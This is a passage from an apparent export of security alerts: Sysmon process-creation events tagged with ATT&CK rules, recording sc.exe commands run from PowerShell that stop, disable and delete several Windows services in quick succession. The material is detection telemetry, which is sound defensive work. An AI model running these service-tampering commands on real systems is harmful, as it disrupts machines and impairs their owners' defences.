12:49:35.775"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00107f9b1900}"",""processId"":""7612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.294",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.754 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ec991900} +ProcessId: 7556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.756176800Z"",""eventRecordID"":""2175"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.754\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ec991900}\r\nProcessId: 7556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.754"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ec991900}"",""processId"":""7556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.274",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.741 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001023991900} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.744244900Z"",""eventRecordID"":""2174"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.741\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001023991900}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.741"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001023991900}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.704 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7961900} +ProcessId: 7452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.706455400Z"",""eventRecordID"":""2171"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.704\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7961900}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.704"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c7961900}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.167",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.671 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001059941900} +ProcessId: 7372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.673461400Z"",""eventRecordID"":""2168"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.671\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001059941900}\r\nProcessId: 7372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.671"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001059941900}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.151",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.655 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107d931900} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.658586400Z"",""eventRecordID"":""2167"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.655\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107d931900}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.655"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00107d931900}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.103",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.610 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010d3911900} +ProcessId: 7292 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.613516600Z"",""eventRecordID"":""2165"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.610\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010d3911900}\r\nProcessId: 7292\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:35.610"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010d3911900}"",""processId"":""7292"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 